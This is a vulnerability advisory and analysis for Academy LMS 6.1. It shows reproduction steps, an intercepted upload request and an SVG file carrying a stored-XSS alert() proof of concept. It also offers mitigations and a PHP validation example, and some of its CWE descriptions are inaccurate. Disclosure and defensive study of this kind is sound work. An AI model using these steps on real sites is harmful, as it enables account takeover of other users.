Academy LMS 6.1 - Arbitrary File Upload

Exploit Author: CraCkEr Analysis Author: www.bubbleslearn.ir Category: WebApps Language: PHP Published Date: 2023-09-04
# Exploit Title: Academy LMS 6.1 - Arbitrary File Upload
# Exploit Author: CraCkEr
# Date: 05/08/2023
# Vendor: Creativeitem
# Vendor Homepage: https://academylms.net/
# Software Link: https://demo.academylms.net/
# Version: 6.1
# Tested on: Windows 10 Pro
# Impact: Allows User to upload files to the web server
# CWE: CWE-79 - CWE-74 - CWE-707


## Description

Allows an attacker to upload malicious files onto the server, such as an SVG carrying Stored XSS


## Steps to Reproduce:

1. Log in as a [Normal User]
2. In [User Dashboard], go to [Profile Settings] on this Path: https://website/dashboard/#/settings
3. Upload any Image into the [avatar]
4. Capture the POST Request with [Burp Proxy Intercept]
5. Edit the file extension to .svg & inject your [Evil-Code] or [Stored XSS]

-----------------------------------------------------------
POST /wp-admin/async-upload.php HTTP/2

-----------------------------------------------------------
Content-Disposition: form-data; name="async-upload"; filename="ahacka.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert("XSS by CraCkEr");
</script>
</svg>
-----------------------------------------------------------

6. Send the Request
7. Capture the GET request from [Burp Logger] to get the Path of your Uploaded [Stored-XSS]
8. Access your Uploaded Evil file on this Path: https://website/wp-content/uploads/***/**/*****.svg



[-] Done


Academy LMS 6.1 – Arbitrary File Upload Vulnerability: A Deep Dive into Stored XSS Exploitation

Academy LMS 6.1, a widely used learning management system developed by Creativeitem, has been found to harbor a critical security flaw: Arbitrary File Upload. This vulnerability, identified by researcher CraCkEr on August 5, 2023, allows authenticated users to upload malicious files—specifically crafted SVG files—directly to the server’s public directory, enabling Stored Cross-Site Scripting (XSS) attacks. The implications are severe, as this flaw bypasses standard file validation and permits attackers to inject persistent JavaScript payloads that execute whenever the file is accessed.

Understanding the Vulnerability: CWE-79, CWE-74, and CWE-707

The exploit falls under three well-known CWE (Common Weakness Enumeration) categories:

  • CWE-79: Improper Neutralization of Input During Output – This refers to the failure to sanitize user input before rendering it in web output, allowing malicious scripts to be executed.
  • CWE-74: Improper Neutralization of Input – Indicates a lack of validation or filtering of user-supplied data, particularly during file uploads.
  • CWE-707: Improper Restriction of Operations within the Bounds of a Data Type – Highlights the absence of proper file type restrictions, allowing non-image formats to be uploaded under the guise of image files.

These weaknesses collectively point to a systemic failure in input validation and file handling, which is often overlooked in web applications that assume "image uploads" are inherently safe.

Exploitation Path: Step-by-Step Breakdown

Attackers can exploit this vulnerability through a simple yet effective workflow:

  1. Authentication: Log in as a normal user with basic privileges.
  2. Access Profile Settings: Navigate to the User Dashboard and access the Profile Settings section at https://website/dashboard/#/settings.
  3. Upload Image: Select any image file (e.g., a PNG or JPEG) and upload it as an avatar.
  4. Intercept Request: Use Burp Suite to capture the POST request to /wp-admin/async-upload.php.
  5. Modify File Extension: Change the filename from image.png to ahacka.svg and set the Content-Type to image/svg+xml.
  6. Inject Malicious Payload: Replace the image content with a malicious SVG file containing embedded JavaScript.
  7. Send Request: Forward the modified request to the server.
  8. Retrieve File Path: Use Burp Logger to capture the resulting GET request and determine the uploaded file’s URL.
  9. Trigger XSS: Access the uploaded file via https://website/wp-content/uploads/***/**/*****.svg, triggering the script.

Malicious SVG Payload: The Core of the Attack

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert("XSS by CraCkEr");
</script>
</svg>

This SVG file is crafted to appear as a harmless image while containing a stored XSS payload. The <script> tag is embedded directly in the SVG document, which is parsed by browsers that support SVG rendering. Since the file is uploaded to a public directory, any user visiting the URL will execute the script.

Why SVG is Effective: SVG files are often not subjected to strict MIME-type validation, especially in systems that assume all uploaded files are images. This makes them ideal for bypassing security checks. Additionally, SVGs are inherently XML-based, allowing for full scripting capabilities—something not commonly expected in image files.

Impact and Real-World Consequences

Impact               | Description
---------------------|------------------------------------------------------------
Stored XSS           | Malicious scripts persist on the server and execute on every access, compromising all users who view the file.
Privilege Escalation | Attackers can upload PHP files (if file extensions are not restricted) to achieve remote code execution.
Session Hijacking    | JavaScript can steal cookies or session tokens, enabling account takeover.
Phishing             | SVG files can redirect users to fake login pages or trigger pop-ups mimicking legitimate interfaces.

Even in a seemingly benign context like avatar uploads, this vulnerability opens the door to full-scale compromise of the LMS environment.

Security Recommendations and Fixes

Organizations using Academy LMS 6.1 must act immediately to mitigate this risk. The following measures are recommended:

  • Strict File Type Validation: Implement server-side checks using MIME type detection and file extension filtering. Only allow .jpg, .png, and .gif for avatar uploads.
  • Content Inspection: Scan uploaded files for embedded scripts, <script>, or <iframe> tags using regex or XML parsers.
  • Upload Directory Restriction: Store uploaded files in a non-public directory and serve them via a secure proxy script, preventing direct access.
  • Sanitization: Use libraries like DOMPurify to sanitize SVG content before rendering.
  • Regular Audits: Conduct penetration testing and code reviews to identify similar vulnerabilities in other upload paths.
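The following is an added example, not code from Academy LMS or from the advisory, showing what the "Why SVG is Effective" paragraph and the recommendations above amount to in PHP: the avatar handler decides from the file's bytes (libmagic plus a raster decode) rather than from the client's filename or Content-Type, so the SVG in the request above is refused; a separate XPath check flags active content inside an SVG for products that must accept the format; and stored files get a server-generated name and are served with headers that stop script execution even if something slips through. The form field name `avatar`, the storage path, the size limit and the function names are assumptions made for the example.

```php
<?php
// Added example (not Academy LMS code). Assumed: $_FILES['avatar'], the
// storage directory, the 2 MB limit and the allowed types are all illustrative.
declare(strict_types=1);

const AVATAR_MAX_BYTES = 2 * 1024 * 1024;

// Allowlist keyed by the MIME type detected from the bytes; the value is the
// extension the server stores. Client filename and Content-Type are ignored.
const AVATAR_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

// True when an SVG carries active content: <script>, <foreignObject>,
// on* event-handler attributes or javascript: URLs. For products that must
// accept SVG somewhere; avatars should simply not accept it.
function svgHasActiveContent(string $svg): bool
{
    $prev = libxml_use_internal_errors(true);
    $doc  = new DOMDocument();
    // LIBXML_NONET: never fetch the external DTD or entities over the network.
    $ok = $doc->loadXML($svg, LIBXML_NONET);
    libxml_use_internal_errors($prev);
    if ($ok === false) {
        return true; // unparsable XML counts as unsafe, not as "no script"
    }
    $xpath = new DOMXPath($doc);
    // Match by local name so a prefix (<svg:script>) or mixed case cannot evade it.
    $query = '//*[translate(local-name(),"SCRIPT","script")="script"]'
           . ' | //*[translate(local-name(),"FOREIGNOBJECT","foreignobject")="foreignobject"]'
           . ' | //@*[starts-with(translate(local-name(),"ON","on"),"on")]'
           . ' | //@*[contains(translate(.,"JAVASCRIPT","javascript"),"javascript:")]';
    return $xpath->query($query)->length > 0;
}

// Validates one $_FILES entry and returns the extension to store it under.
// Every decision comes from the file's bytes, none from the request.
function validateAvatar(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if (($file['size'] ?? 0) > AVATAR_MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }
    // 1. Sniff the real type from magic bytes: an SVG is reported as
    //    image/svg+xml (or text/xml) and is rejected here regardless of name.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset(AVATAR_TYPES[$mime])) {
        throw new RuntimeException("disallowed type: $mime");
    }
    // 2. Require a decodable raster image; getimagesize() returns false for
    //    XML, and its own mime must agree with finfo's.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || $info['mime'] !== $mime) {
        throw new RuntimeException('not a valid raster image');
    }
    return AVATAR_TYPES[$mime];
}

// Stores the file under a random server-chosen name so neither the name nor
// the extension is attacker-controlled; returns that name.
function storeAvatar(array $file, string $dir): string
{
    $name = bin2hex(random_bytes(16)) . '.' . validateAvatar($file);
    if (!move_uploaded_file($file['tmp_name'], $dir . '/' . $name)) {
        throw new RuntimeException('could not store file');
    }
    return $name;
}

// Serves an avatar from a non-public directory. nosniff stops the browser
// re-guessing the type; a sandboxed CSP means a file that slipped through
// still cannot run script in the site's origin.
function serveAvatar(string $dir, string $name): void
{
    $path = $dir . '/' . $name;
    if (!preg_match('/^[a-f0-9]{32}\.(jpg|png|gif)$/', $name) || !is_file($path)) {
        http_response_code(404);
        return;
    }
    header('Content-Type: ' . mime_content_type($path));
    header('X-Content-Type-Options: nosniff');
    header("Content-Security-Policy: default-src 'none'; sandbox");
    readfile($path);
}

// Assumed upload route: store or reject, and never echo the client's filename.
if (isset($_FILES['avatar'])) {
    try {
        echo 'stored as ' . storeAvatar($_FILES['avatar'], '/var/app/avatars');
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'rejected: ' . htmlspecialchars($e->getMessage(), ENT_QUOTES, 'UTF-8');
    }
}
```

Against the request shown in the advisory, `validateAvatar()` fails at the first check because libmagic reports the body as XML/SVG, not as one of the three raster types, whatever the `filename` and `Content-Type` parts of the multipart say; the second check catches a raster file whose header is valid but whose body does not decode. `svgHasActiveContent()` would flag the same document through the `<script>` element, and is the kind of check to run on SVG that a product does accept elsewhere, before any DOMPurify-style sanitisation. The `sandbox` directive in `serveAvatar()` is what removes the origin from the equation: a file served under that policy runs no script and cannot read the site's cookies, which is the defense-in-depth layer the article's last section calls for.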

Additionally, developers should avoid relying solely on client-side validation. Server-side enforcement is critical to prevent attackers from bypassing front-end checks.

Conclusion: A Lesson in Defense-in-Depth

The Academy LMS 6.1 arbitrary file upload vulnerability underscores a fundamental truth in cybersecurity: assumptions about file safety are dangerous. Just because a file is labeled as an "image" doesn’t mean it’s safe. Attackers exploit trust in file types to deliver malicious payloads.

Security professionals must adopt a defense-in-depth approach—validating file content, restricting file types, and sanitizing output. This exploit serves as a reminder that even small features like profile avatars can become entry points for devastating attacks.

For administrators: Update to the latest version or apply patches immediately. For developers: never trust user input—validate, sanitize, and restrict. Security is not a feature; it’s a foundation.